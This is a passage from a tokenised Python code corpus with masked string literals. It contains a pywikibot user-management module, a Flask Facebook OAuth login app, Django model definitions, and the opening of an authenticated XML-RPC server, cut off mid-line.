) <EOL> import pywt <EOL> self . assertTrue ( "<STR_LIT>" in sys . modules ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> __version__ = '<STR_LIT>' <EOL> import re <EOL> import wikipedia as pywikibot <EOL> import config <EOL> import query <EOL> class AutoblockUser ( pywikibot . Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class UserActionRefuse ( pywikibot . Error ) : <EOL> pass <EOL> class BlockError ( UserActionRefuse ) : <EOL> pass <EOL> class AlreadyBlocked ( BlockError ) : <EOL> pass <EOL> class UnblockError ( UserActionRefuse ) : <EOL> pass <EOL> class BlockIDError ( UnblockError ) : <EOL> pass <EOL> class AlreadyUnblocked ( UnblockError ) : <EOL> pass <EOL> class InvalidUser ( pywikibot . InvalidTitle ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> ip_regexp = re . compile ( r'<STR_LIT>' <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' , <EOL> re . IGNORECASE ) <EOL> class User ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , site , name ) : <EOL> """<STR_LIT>""" <EOL> if len ( name ) > <NUM_LIT:1> and name [ <NUM_LIT:0> ] == u'<STR_LIT:#>' : <EOL> self . _isAutoblock = True <EOL> else : <EOL> self . _isAutoblock = False <EOL> if self . _isAutoblock : <EOL> pywikibot . output ( <EOL> "<STR_LIT>" ) <EOL> if type ( site ) in [ str , unicode ] : <EOL> self . _site = pywikibot . getSite ( site ) <EOL> else : <EOL> self . _site = site <EOL> if self . _site . lang in self . _site . family . nocapitalize : <EOL> self . _name = name <EOL> else : <EOL> self . _name = name [ <NUM_LIT:0> ] . upper ( ) + name [ <NUM_LIT:1> : ] <EOL> self . _name = self . _name . replace ( '<STR_LIT:_>' , '<STR_LIT:U+0020>' ) <EOL> self . _blocked = None <EOL> self . _groups = None <EOL> self . _registrationTime = - <NUM_LIT:1> <EOL> def site ( self ) : <EOL> return self . _site <EOL> def name ( self ) : <EOL> return self . username <EOL> @ property <EOL> def username ( self ) : <EOL> return self . _name <EOL> def isRegistered ( self , force = False ) : <EOL> """<STR_LIT>""" <EOL> if self . 
isAnonymous ( ) : <EOL> return False <EOL> else : <EOL> return self . registrationTime ( force ) != - <NUM_LIT:1> <EOL> def isAnonymous ( self ) : <EOL> return ip_regexp . match ( self . username . split ( "<STR_LIT:/>" ) [ <NUM_LIT:0> ] ) is not None <EOL> def exists ( self ) : <EOL> return self . isAnonymous ( ) or self . isRegistered ( ) <EOL> def __str__ ( self ) : <EOL> return ( u'<STR_LIT>' <EOL> % ( self . site ( ) , self . name ( ) ) ) . encode ( config . console_encoding , <EOL> '<STR_LIT:replace>' ) <EOL> def __repr__ ( self ) : <EOL> return self . __str__ ( ) <EOL> def _load ( self ) : <EOL> getall ( self . site ( ) , [ self ] , force = True ) <EOL> def registrationTime ( self , force = False ) : <EOL> if self . _registrationTime < <NUM_LIT:0> or force : <EOL> self . _load ( ) <EOL> return self . _registrationTime <EOL> def editCount ( self , force = False ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( self , '<STR_LIT>' ) or force : <EOL> self . _load ( ) <EOL> return self . _editcount <EOL> def isBlocked ( self , force = False ) : <EOL> """<STR_LIT>""" <EOL> if not self . _blocked or force : <EOL> self . _load ( ) <EOL> return self . _blocked <EOL> def isEmailable ( self , force = False ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> self . _load ( ) <EOL> return self . _mailable <EOL> def groups ( self , force = False ) : <EOL> """<STR_LIT>""" <EOL> if not self . _groups or force : <EOL> self . _load ( ) <EOL> return self . _groups <EOL> def getUserPage ( self , subpage = u'<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> if self . _isAutoblock : <EOL> raise AutoblockUser ( <EOL> u"<STR_LIT>" ) <EOL> if subpage : <EOL> subpage = u'<STR_LIT:/>' + subpage <EOL> return pywikibot . Page ( self . site ( ) , self . name ( ) + subpage , <EOL> defaultNamespace = <NUM_LIT:2> ) <EOL> def getUserTalkPage ( self , subpage = u'<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> if self . 
_isAutoblock : <EOL> raise AutoblockUser ( <EOL> u"<STR_LIT>" ) <EOL> if subpage : <EOL> subpage = u'<STR_LIT:/>' + subpage <EOL> return pywikibot . Page ( self . site ( ) , self . name ( ) + subpage , <EOL> defaultNamespace = <NUM_LIT:3> ) <EOL> def sendMail ( self , subject = u'<STR_LIT>' , text = u'<STR_LIT>' , ccMe = False ) : <EOL> """<STR_LIT>""" <EOL> if not self . isEmailable ( ) : <EOL> raise UserActionRefuse ( '<STR_LIT>' ) <EOL> if self . site ( ) . versionnumber ( ) >= <NUM_LIT:16> and not self . site ( ) . isAllowed ( '<STR_LIT>' ) : <EOL> raise UserActionRefuse ( '<STR_LIT>' ) <EOL> if not self . site ( ) . has_api ( ) or self . site ( ) . versionnumber ( ) < <NUM_LIT> : <EOL> return self . sendMailOld ( subject , text , ccMe ) <EOL> params = { <EOL> '<STR_LIT:action>' : '<STR_LIT>' , <EOL> '<STR_LIT:target>' : self . name ( ) , <EOL> '<STR_LIT>' : self . site ( ) . getToken ( ) , <EOL> '<STR_LIT>' : subject , <EOL> '<STR_LIT:text>' : text , <EOL> } <EOL> if ccMe : <EOL> params [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> maildata = query . GetData ( params , self . site ( ) ) <EOL> if '<STR_LIT:error>' in maildata : <EOL> code = maildata [ '<STR_LIT:error>' ] [ '<STR_LIT:code>' ] <EOL> if code == u'<STR_LIT>' : <EOL> pywikibot . output ( u'<STR_LIT>' ) <EOL> elif '<STR_LIT>' in maildata : <EOL> if maildata [ '<STR_LIT>' ] [ '<STR_LIT:result>' ] == u'<STR_LIT>' : <EOL> pywikibot . output ( u'<STR_LIT>' ) <EOL> return True <EOL> return False <EOL> def sendMailOld ( self , subject = u'<STR_LIT>' , text = u'<STR_LIT>' , ccMe = False ) : <EOL> address = self . site ( ) . put_address ( '<STR_LIT>' ) <EOL> predata = { <EOL> "<STR_LIT>" : subject , <EOL> "<STR_LIT>" : text , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> } <EOL> if ccMe : <EOL> predata [ '<STR_LIT>' ] = '<STR_LIT:1>' <EOL> predata [ '<STR_LIT>' ] = self . site ( ) . getToken ( ) <EOL> response , data = self . site ( ) . 
postForm ( address , predata , sysop = False ) <EOL> if data : <EOL> if '<STR_LIT>' in data : <EOL> pywikibot . output ( u'<STR_LIT>' ) <EOL> return True <EOL> else : <EOL> pywikibot . output ( u'<STR_LIT>' ) <EOL> return False <EOL> else : <EOL> pywikibot . output ( u'<STR_LIT>' ) <EOL> return False <EOL> @ pywikibot . deprecated ( '<STR_LIT>' ) <EOL> def editedPages ( self , limit = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> for item in self . contributions ( limit ) : <EOL> yield item [ <NUM_LIT:0> ] <EOL> def contributions ( self , limit = <NUM_LIT> , namespace = [ ] ) : <EOL> """<STR_LIT>""" <EOL> if not self . site ( ) . has_api ( ) : <EOL> raise NotImplementedError <EOL> params = { <EOL> '<STR_LIT:action>' : '<STR_LIT>' , <EOL> '<STR_LIT:list>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : self . name ( ) , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT:title>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : limit , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> if limit > pywikibot . config . special_page_limit : <EOL> params [ '<STR_LIT>' ] = pywikibot . config . special_page_limit <EOL> if limit > <NUM_LIT> and self . site ( ) . isAllowed ( '<STR_LIT>' ) : <EOL> params [ '<STR_LIT>' ] = <NUM_LIT> <EOL> if namespace : <EOL> params [ '<STR_LIT>' ] = namespace <EOL> nbresults = <NUM_LIT:0> <EOL> while True : <EOL> pywikibot . output ( u'<STR_LIT>' <EOL> % ( params [ '<STR_LIT>' ] , self . site ( ) ) ) <EOL> result = query . GetData ( params , self . site ( ) ) <EOL> if '<STR_LIT:error>' in result : <EOL> pywikibot . output ( '<STR_LIT:%s>' % result ) <EOL> raise pywikibot . Error <EOL> for contrib in result [ '<STR_LIT>' ] [ '<STR_LIT>' ] : <EOL> ts = pywikibot . parsetime2stamp ( contrib [ '<STR_LIT>' ] ) <EOL> yield ( pywikibot . Page ( self . site ( ) , contrib [ '<STR_LIT:title>' ] , <EOL> defaultNamespace = contrib [ '<STR_LIT>' ] ) , <EOL> contrib [ '<STR_LIT>' ] , ts , contrib . 
get ( '<STR_LIT>' , None ) ) <EOL> nbresults += <NUM_LIT:1> <EOL> if nbresults >= limit : <EOL> break <EOL> if '<STR_LIT>' in result and nbresults < limit : <EOL> params . update ( result [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> else : <EOL> break <EOL> def uploadedImages ( self , number = <NUM_LIT:10> ) : <EOL> """<STR_LIT>""" <EOL> if self . isAnonymous ( ) : <EOL> raise StopIteration <EOL> if not self . site ( ) . has_api ( ) or self . site ( ) . versionnumber ( ) < <NUM_LIT:11> : <EOL> for c in self . _uploadedImagesOld ( number ) : <EOL> yield c <EOL> return <EOL> for item in self . site ( ) . logpages ( number , mode = '<STR_LIT>' , <EOL> user = self . username , dump = True ) : <EOL> yield ( pywikibot . ImagePage ( self . site ( ) , item [ '<STR_LIT:title>' ] ) , <EOL> item [ '<STR_LIT>' ] , item [ '<STR_LIT>' ] , item [ '<STR_LIT>' ] > <NUM_LIT:0> ) <EOL> def _uploadedImagesOld ( self , number = <NUM_LIT:10> ) : <EOL> """<STR_LIT>""" <EOL> regexp = re . compile ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , re . UNICODE ) <EOL> path = self . site ( ) . log_address ( number , mode = '<STR_LIT>' , user = self . name ( ) ) <EOL> html = self . site ( ) . getUrl ( path ) <EOL> redlink_key = self . site ( ) . mediawiki_message ( '<STR_LIT>' ) <EOL> redlink_tail_len = None <EOL> if redlink_key . startswith ( '<STR_LIT>' ) : <EOL> redlink_tail_len = len ( redlink_key [ <NUM_LIT:3> : ] ) <EOL> for m in regexp . finditer ( html ) : <EOL> image = m . group ( '<STR_LIT:image>' ) <EOL> deleted = False <EOL> if m . group ( '<STR_LIT>' ) : <EOL> deleted = True <EOL> if redlink_tail_len : <EOL> image = image [ <NUM_LIT:0> : <NUM_LIT:0> - redlink_tail_len ] <EOL> date = m . group ( '<STR_LIT:date>' ) <EOL> comment = m . group ( '<STR_LIT>' ) or '<STR_LIT>' <EOL> yield pywikibot . ImagePage ( self . 
site ( ) , <EOL> image ) , date , comment , deleted <EOL> def block ( self , expiry = None , reason = None , anon = True , noCreate = False , <EOL> onAutoblock = False , banMail = False , watchUser = False , <EOL> allowUsertalk = True , reBlock = False , hidename = False ) : <EOL> """<STR_LIT>""" <EOL> if self . _isAutoblock : <EOL> raise AutoblockUser <EOL> if self . isBlocked ( ) and not reBlock : <EOL> raise AlreadyBlocked ( ) <EOL> if not self . site ( ) . isAllowed ( '<STR_LIT>' , sysop = True ) : <EOL> raise UserActionRefuse ( '<STR_LIT>' ) <EOL> if not expiry : <EOL> expiry = pywikibot . input ( <EOL> u'<STR_LIT>' ) <EOL> if not reason : <EOL> reason = pywikibot . input ( u'<STR_LIT>' ) <EOL> if not self . site ( ) . has_api ( ) or self . site ( ) . versionnumber ( ) < <NUM_LIT:12> : <EOL> return self . _blockOld ( expiry , reason , anon , noCreate , <EOL> onAutoblock , banMail , watchUser , <EOL> allowUsertalk , reBlock ) <EOL> params = { <EOL> '<STR_LIT:action>' : '<STR_LIT>' , <EOL> '<STR_LIT:user>' : self . name ( ) , <EOL> '<STR_LIT>' : self . site ( ) . getToken ( self , sysop = True ) , <EOL> '<STR_LIT>' : reason , <EOL> } <EOL> if expiry : <EOL> params [ '<STR_LIT>' ] = expiry <EOL> if anon : <EOL> params [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> if noCreate : <EOL> params [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> if onAutoblock : <EOL> params [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> if banMail : <EOL> params [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> if hidename : <EOL> params [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> if allowUsertalk : <EOL> params [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> if reBlock : <EOL> params [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> data = query . GetData ( params , self . 
site ( ) , sysop = True ) <EOL> if '<STR_LIT:error>' in data : <EOL> errCode = data [ '<STR_LIT:error>' ] [ '<STR_LIT:code>' ] <EOL> if errCode == '<STR_LIT>' : <EOL> raise AlreadyBlocked ( ) <EOL> elif errCode == '<STR_LIT>' : <EOL> raise AlreadyBlocked ( "<STR_LIT>" ) <EOL> elif errCode == '<STR_LIT>' : <EOL> raise BlockError ( "<STR_LIT>" ) <EOL> elif errCode == '<STR_LIT>' : <EOL> raise BlockError ( "<STR_LIT>" ) <EOL> elif errCode == '<STR_LIT>' : <EOL> raise BlockError ( "<STR_LIT>" ) <EOL> elif '<STR_LIT>' in data : <EOL> return True <EOL> else : <EOL> pywikibot . output ( "<STR_LIT>" % data ) <EOL> raise BlockError <EOL> raise False <EOL> def _blockOld ( self , expiry , reason , anonOnly , noSignup , enableAutoblock , <EOL> emailBan , watchUser , allowUsertalk ) : <EOL> """<STR_LIT>""" <EOL> token = self . site ( ) . getToken ( self , sysop = True ) <EOL> pywikibot . output ( u"<STR_LIT>" % self . name ( ) ) <EOL> boolStr = [ '<STR_LIT:0>' , '<STR_LIT:1>' ] <EOL> predata = { <EOL> '<STR_LIT>' : self . name ( ) , <EOL> '<STR_LIT>' : expiry , <EOL> '<STR_LIT>' : reason , <EOL> '<STR_LIT>' : boolStr [ anonOnly ] , <EOL> '<STR_LIT>' : boolStr [ noSignup ] , <EOL> '<STR_LIT>' : boolStr [ enableAutoblock ] , <EOL> '<STR_LIT>' : boolStr [ emailBan ] , <EOL> '<STR_LIT>' : boolStr [ watchUser ] , <EOL> '<STR_LIT>' : boolStr [ allowUsertalk ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : token <EOL> } <EOL> address = self . site ( ) . block_address ( ) <EOL> response , data = self . site ( ) . postForm ( address , predata , sysop = True ) <EOL> if data : <EOL> if self . site ( ) . mediawiki_message ( <EOL> '<STR_LIT>' ) . replace ( '<STR_LIT>' , self . name ( ) ) in data : <EOL> raise AlreadyBlockedError <EOL> raise BlockError <EOL> return True <EOL> def unblock ( self , reason = None ) : <EOL> """<STR_LIT>""" <EOL> if self . name ( ) [ <NUM_LIT:0> ] == '<STR_LIT:#>' : <EOL> blockID = self . name ( ) [ <NUM_LIT:1> : ] <EOL> else : <EOL> blockID = self . 
_getBlockID ( ) <EOL> if not self . site ( ) . has_api ( ) or self . site ( ) . versionnumber ( ) < <NUM_LIT:12> : <EOL> return self . _unblockOld ( blockID , reason ) <EOL> self . _unblock ( blockID , reason ) <EOL> def _getBlockID ( self ) : <EOL> pywikibot . output ( u"<STR_LIT>" % self . name ( ) ) <EOL> if self . isAnonymous ( ) : <EOL> usertype = "<STR_LIT>" <EOL> else : <EOL> usertype = "<STR_LIT>" <EOL> if not self . site ( ) . has_api ( ) or self . site ( ) . versionnumber ( ) < <NUM_LIT:12> : <EOL> return getBlockIDOld ( ) <EOL> data = self . site ( ) . blocksearch_address ( self . name ( ) , usertype ) <EOL> try : <EOL> bIDre = data [ <NUM_LIT:1> ] [ "<STR_LIT>" ] [ "<STR_LIT>" ] [ <NUM_LIT:0> ] [ "<STR_LIT:id>" ] <EOL> except IndexError : <EOL> pywikibot . output ( data ) <EOL> raise BlockIDError <EOL> return bIDre <EOL> def _unblock ( self , blockID , reason ) : <EOL> pywikibot . output ( u"<STR_LIT>" % self . name ( ) ) <EOL> params = { <EOL> '<STR_LIT:action>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : reason , <EOL> '<STR_LIT:id>' : blockID , <EOL> '<STR_LIT>' : self . site ( ) . getToken ( self , sysop = True ) , <EOL> } <EOL> data = query . GetData ( params , self . site ( ) , back_response = True , <EOL> sysop = True ) <EOL> if '<STR_LIT:error>' in data : <EOL> pywikibot . output ( "<STR_LIT>" % str ( data [ '<STR_LIT:error>' ] ) ) <EOL> return True <EOL> def _unblockOld ( self , blockID , reason ) : <EOL> pywikibot . output ( u"<STR_LIT>" % self . name ( ) ) <EOL> token = self . site ( ) . getToken ( self , sysop = True ) <EOL> predata = { <EOL> '<STR_LIT:id>' : blockID , <EOL> '<STR_LIT>' : reason , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : token , <EOL> } <EOL> address = self . site ( ) . unblock_address ( ) <EOL> response , data = self . site ( ) . postForm ( address , predata , sysop = True ) <EOL> if response . code != <NUM_LIT> : <EOL> if self . site ( ) . mediawiki_message ( <EOL> '<STR_LIT>' ) . 
replace ( '<STR_LIT>' , blockID ) in data : <EOL> raise AlreadyUnblockedError <EOL> raise UnblockError ( data ) <EOL> return True <EOL> def getBlockIDOld ( self ) : <EOL> self . family . blocksearch_address ( self . lang , s ) <EOL> address = self . site ( ) . blocksearch_address ( self . name ( ) ) <EOL> data = self . site ( ) . getUrl ( address ) <EOL> bIDre = re . search ( r'<STR_LIT>' , data ) <EOL> if not bIDre : <EOL> pywikibot . output ( data ) <EOL> raise BlockIDError <EOL> return bIDre . group ( <NUM_LIT:1> ) <EOL> def getall ( site , users , throttle = True , force = False ) : <EOL> """<STR_LIT>""" <EOL> users = list ( users ) <EOL> if len ( users ) > <NUM_LIT:1> : <EOL> pywikibot . output ( u'<STR_LIT>' <EOL> % ( len ( users ) , site ) ) <EOL> if len ( users ) > <NUM_LIT> : <EOL> for urg in range ( <NUM_LIT:0> , len ( users ) , <NUM_LIT> ) : <EOL> if urg == range ( <NUM_LIT:0> , len ( users ) , <NUM_LIT> ) [ - <NUM_LIT:1> ] : <EOL> k = users [ urg : ] <EOL> _GetAllUI ( site , k , throttle , force ) . run ( ) <EOL> users [ urg : ] = k <EOL> else : <EOL> k = users [ urg : urg + <NUM_LIT> ] <EOL> _GetAllUI ( site , k , throttle , force ) . run ( ) <EOL> users [ urg : urg + <NUM_LIT> ] = k <EOL> else : <EOL> _GetAllUI ( site , users , throttle , force ) . run ( ) <EOL> class _GetAllUI ( object ) : <EOL> def __init__ ( self , site , users , throttle , force ) : <EOL> self . site = site <EOL> self . users = [ ] <EOL> self . throttle = throttle <EOL> self . force = force <EOL> self . sleeptime = <NUM_LIT:15> <EOL> for user in users : <EOL> if not hasattr ( user , '<STR_LIT>' ) or force : <EOL> self . users . append ( user ) <EOL> elif pywikibot . verbose : <EOL> pywikibot . output ( u"<STR_LIT>" % user . name ( ) ) <EOL> def run ( self ) : <EOL> if self . users : <EOL> while True : <EOL> try : <EOL> data = self . getData ( ) <EOL> except Exception , e : <EOL> print e <EOL> raise <EOL> else : <EOL> break <EOL> for uj in self . 
users : <EOL> try : <EOL> x = data [ uj . name ( ) ] <EOL> except KeyError : <EOL> break <EOL> if '<STR_LIT>' in x : <EOL> break <EOL> uj . _editcount = x [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in x : <EOL> uj . _groups = x [ '<STR_LIT>' ] <EOL> else : <EOL> uj . _groups = [ ] <EOL> if x [ '<STR_LIT>' ] : <EOL> uj . _registrationTime = pywikibot . parsetime2stamp ( <EOL> x [ '<STR_LIT>' ] ) <EOL> else : <EOL> uj . _registrationTime = <NUM_LIT:0> <EOL> uj . _mailable = ( "<STR_LIT>" in x ) <EOL> uj . _blocked = ( '<STR_LIT>' in x ) <EOL> def getData ( self ) : <EOL> users = { } <EOL> params = { <EOL> '<STR_LIT:action>' : '<STR_LIT>' , <EOL> '<STR_LIT:list>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : u'<STR_LIT:|>' . join ( [ n . name ( ) for n in self . users ] ) , <EOL> } <EOL> data = query . GetData ( params , self . site ) <EOL> for user in data [ '<STR_LIT>' ] [ '<STR_LIT>' ] : <EOL> if u'<STR_LIT>' in user : <EOL> raise InvalidUser ( <EOL> "<STR_LIT>" <EOL> % user [ '<STR_LIT:name>' ] ) <EOL> users [ user [ '<STR_LIT:name>' ] ] = user <EOL> return users <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> """<STR_LIT>""" <EOL> pywikibot . output ( """<STR_LIT>""" ) <EOL> import tests . test_userlib <EOL> import unittest <EOL> unittest . main ( tests . test_userlib ) </s>
<s> import os <EOL> from flask import ( Flask , redirect , url_for , session , request , <EOL> render_template , g ) <EOL> from flask . ext . login import ( LoginManager , login_required , login_user , <EOL> logout_user , current_user ) <EOL> from flask . ext . sqlalchemy import SQLAlchemy <EOL> from flask_oauth import OAuth <EOL> FACEBOOK_APP_ID = os . environ [ '<STR_LIT>' ] <EOL> FACEBOOK_APP_SECRET = os . environ [ '<STR_LIT>' ] <EOL> app = Flask ( __name__ ) <EOL> app . debug = True <EOL> app . secret_key = os . environ [ '<STR_LIT>' ] <EOL> app . config [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> db = SQLAlchemy ( app ) <EOL> class User ( db . Model ) : <EOL> id = db . Column ( db . Integer , primary_key = True ) <EOL> social_id = db . Column ( db . Integer , unique = True ) <EOL> name = db . Column ( db . String , nullable = False ) <EOL> email = db . Column ( db . String , nullable = True ) <EOL> def __init__ ( self , name , social_id , email = None ) : <EOL> self . name = name <EOL> self . social_id = social_id <EOL> self . email = email <EOL> def is_authenticated ( self ) : <EOL> return True <EOL> def is_active ( self ) : <EOL> return True <EOL> def is_anonymous ( self ) : <EOL> return False <EOL> def get_id ( self ) : <EOL> return unicode ( self . id ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( self . name ) <EOL> oauth = OAuth ( ) <EOL> login_manager = LoginManager ( ) <EOL> login_manager . init_app ( app ) <EOL> login_manager . login_view = '<STR_LIT>' <EOL> facebook = oauth . remote_app ( '<STR_LIT>' , <EOL> base_url = '<STR_LIT>' , <EOL> request_token_url = None , <EOL> access_token_url = '<STR_LIT>' , <EOL> authorize_url = '<STR_LIT>' , <EOL> consumer_key = FACEBOOK_APP_ID , <EOL> consumer_secret = FACEBOOK_APP_SECRET , <EOL> request_token_params = { '<STR_LIT>' : '<STR_LIT:email>' } <EOL> ) <EOL> @ login_manager . unauthorized_handler <EOL> def unauthorized ( ) : <EOL> return "<STR_LIT>" <EOL> @ login_manager . 
user_loader <EOL> def load_user ( id ) : <EOL> return User . query . get ( int ( id ) ) <EOL> @ app . before_request <EOL> def before_request ( ) : <EOL> g . user = current_user <EOL> @ app . route ( '<STR_LIT>' ) <EOL> @ facebook . authorized_handler <EOL> def facebook_authorized ( resp ) : <EOL> if resp is None : <EOL> return '<STR_LIT>' % ( <EOL> request . args [ '<STR_LIT>' ] , <EOL> request . args [ '<STR_LIT>' ] <EOL> ) <EOL> session [ '<STR_LIT>' ] = ( resp [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> me = facebook . get ( '<STR_LIT>' ) . data <EOL> user = User . query . filter_by ( social_id = me [ '<STR_LIT:id>' ] ) . first ( ) <EOL> print user <EOL> if user is not None : <EOL> login_user ( user ) <EOL> return redirect ( url_for ( '<STR_LIT>' ) ) <EOL> else : <EOL> if "<STR_LIT:email>" in me : <EOL> user = User ( me [ '<STR_LIT:name>' ] , me [ '<STR_LIT:id>' ] , me [ '<STR_LIT:email>' ] ) <EOL> else : <EOL> user = User ( me [ '<STR_LIT:name>' ] , me [ '<STR_LIT:id>' ] ) <EOL> db . session . add ( user ) <EOL> db . session . commit ( ) <EOL> login_user ( user ) <EOL> return redirect ( url_for ( '<STR_LIT>' ) ) <EOL> @ facebook . tokengetter <EOL> def get_facebook_oauth_token ( ) : <EOL> return session . get ( '<STR_LIT>' ) <EOL> @ app . route ( '<STR_LIT:/>' ) <EOL> def index ( ) : <EOL> return render_template ( '<STR_LIT>' ) <EOL> @ app . route ( '<STR_LIT>' ) <EOL> @ login_required <EOL> def user ( ) : <EOL> return render_template ( '<STR_LIT>' , user = current_user ) <EOL> @ app . route ( '<STR_LIT>' ) <EOL> def login ( ) : <EOL> if current_user . is_anonymous ( ) : <EOL> return facebook . authorize ( callback = url_for ( '<STR_LIT>' , <EOL> next = request . args . get ( '<STR_LIT>' ) or request . referrer or None , <EOL> _external = True ) ) <EOL> return redirect ( url_for ( '<STR_LIT>' ) ) <EOL> @ app . 
route ( '<STR_LIT>' ) <EOL> @ login_required <EOL> def logout ( ) : <EOL> logout_user ( ) <EOL> return redirect ( url_for ( '<STR_LIT>' ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> db . create_all ( ) <EOL> app . run ( port = <NUM_LIT> ) </s>
<s> from django . db import models <EOL> class Product ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT:100> ) <EOL> price = models . DecimalField ( max_digits = <NUM_LIT:10> , decimal_places = <NUM_LIT:2> ) <EOL> class Cart ( models . Model ) : <EOL> items = models . ManyToManyField ( Product , through = "<STR_LIT>" ) <EOL> class CartItem ( models . Model ) : <EOL> product = models . ForeignKey ( Product ) <EOL> cart = models . ForeignKey ( Cart ) <EOL> quantity = models . PositiveIntegerField ( default = <NUM_LIT:1> ) <EOL> def get_item_amount ( self , instance ) : <EOL> return self . product . price * self . quantity <EOL> def __unicode__ ( self ) : <EOL> return "<STR_LIT>" % ( self . quantity , self . product . name ) </s>
<s> from django . db import models <EOL> class Page ( models . Model ) : <EOL> title = models . CharField ( max_length = <NUM_LIT:255> , default = "<STR_LIT>" , blank = True ) <EOL> type = models . CharField ( max_length = <NUM_LIT:50> , default = "<STR_LIT>" , blank = True ) <EOL> content = models . TextField ( default = "<STR_LIT>" , blank = True ) <EOL> @ models . permalink <EOL> def get_absolute_url ( self ) : <EOL> return ( '<STR_LIT>' , [ self . type ] , { } ) <EOL> def __unicode__ ( self ) : <EOL> return self . title or self . content <EOL> class Product ( models . Model ) : <EOL> meta_description = models . TextField ( default = "<STR_LIT>" ) <EOL> meta_keywords = models . CharField ( max_length = <NUM_LIT:255> , default = "<STR_LIT>" ) <EOL> meta_title = models . CharField ( max_length = <NUM_LIT:255> , default = "<STR_LIT>" ) <EOL> @ models . permalink <EOL> def get_absolute_url ( self ) : <EOL> return ( '<STR_LIT>' , [ self . id ] , { } ) <EOL> def __unicode__ ( self ) : <EOL> return self . meta_title <EOL> class Category ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT:255> , default = "<STR_LIT>" ) <EOL> page_title = models . CharField ( max_length = <NUM_LIT:255> , default = "<STR_LIT>" ) <EOL> @ models . permalink <EOL> def get_absolute_url ( self ) : <EOL> return ( '<STR_LIT>' , [ "<STR_LIT:abc>" ] , { } ) <EOL> class NoPath ( models . Model ) : <EOL> pass <EOL> class Tag ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT:255> , default = "<STR_LIT>" ) <EOL> @ models . permalink <EOL> def get_absolute_url ( self ) : <EOL> return ( '<STR_LIT>' , [ self . name ] , { } ) <EOL> def __unicode__ ( self ) : <EOL> return self . name </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import re <EOL> import shutil <EOL> import tempfile <EOL> import sqlite3 <EOL> import cPickle <EOL> import base64 <EOL> import zlib <EOL> import xmlrpclib <EOL> import SocketServer <EOL> import socket <EOL> from SimpleXMLRPCServer import ( SimpleXMLRPCServer , SimpleXMLRPCRequestHandler ) <EOL> try : <EOL> from sage . rings . all import is_Integer , is_RealNumber <EOL> except : <EOL> is_Integer = lambda x : False <EOL> is_RealNumber = lambda x : False <EOL> class VerifyingServer ( SocketServer . ForkingMixIn , <EOL> SimpleXMLRPCServer ) : <EOL> def __init__ ( self , username , password , * args , ** kargs ) : <EOL> self . username = username <EOL> self . password = password <EOL> class VerifyingRequestHandler ( SimpleXMLRPCRequestHandler ) : <EOL> def parse_request ( myself ) : <EOL> if SimpleXMLRPCRequestHandler . parse_request ( myself ) : <EOL> if self . authenticate ( myself . headers ) : <EOL> return True <EOL> else : <EOL> myself . send_error ( <NUM_LIT> , '<STR_LIT>' ) <EOL> return False <EOL> SimpleXMLRPCServer . __init__ ( self , <EOL> requestHandler = VerifyingRequestHandler , <EOL> logRequests = False , <EOL> * args , ** kargs ) <EOL> def authenticate ( self , headers ) : <EOL> ( basic , _ , encoded ) = headers . get ( '<STR_LIT>' ) . partition ( '<STR_LIT:U+0020>' ) <EOL> assert basic == '<STR_LIT>' , '<STR_LIT>' <EOL> ( username , _ , password ) = base64 . b64decode ( encoded ) . partition ( '<STR_LIT::>' ) <EOL> return username == self . username and password == self . 
